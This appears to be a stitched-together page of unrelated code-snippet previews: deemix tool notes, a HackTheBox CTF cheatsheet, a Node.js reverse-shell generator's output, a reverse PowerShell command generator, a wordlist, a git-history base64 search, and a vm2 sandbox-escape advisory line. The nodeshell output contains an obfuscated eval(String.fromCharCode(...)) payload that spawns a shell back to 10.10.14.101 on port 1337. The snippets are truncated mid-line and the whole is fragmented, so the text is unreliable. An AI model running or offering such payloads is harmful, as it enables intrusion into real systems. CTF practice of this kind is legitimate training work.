Thanks to /u/zpoo32 for reporting several issues in this list!
- deemix: just the cli and the library
- deemix-pyweb: the app with a GUI
- deemix-server: just the server part of deemix-pyweb
Thanks to /u/zpoo32 for reporting several issues in this list!
Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.
Because a smart man once said:
Never google twice.
./nodeshell.py 10.10.14.101 1337 | |
[+] LHOST = 10.10.14.101 | |
[+] LPORT = 1337 | |
[+] Encoding | |
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,49,48,49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,9 |
#!/usr/bin/env python3 | |
# | |
# generate reverse powershell cmdline with base64 encoded args | |
# | |
import sys | |
import base64 | |
def help(): | |
print("USAGE: %s IP PORT" % sys.argv[0]) |
import requests | |
import json | |
import sys | |
import argparse | |
_strip = ['http://', 'https://', 'www'] | |
G = '\033[92m' | |
Y = '\033[93m' |
0 | |
00 | |
01 | |
02 | |
03 | |
1 | |
1.0 | |
10 | |
100 | |
1000 |
from pydriller import RepositoryMining | |
import re | |
import base64 | |
foundSet = set() | |
for commit in RepositoryMining('./').traverse_commits(): | |
for mod in commit.modifications: | |
if mod.source_code_before != None: | |
regex = re.findall(r"<text encoding=\"base64\">[^>]+</text>", mod.source_code_before) | |
for result in regex: |
There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException()
which can be used to escape the sandbox and run arbitrary code in host context.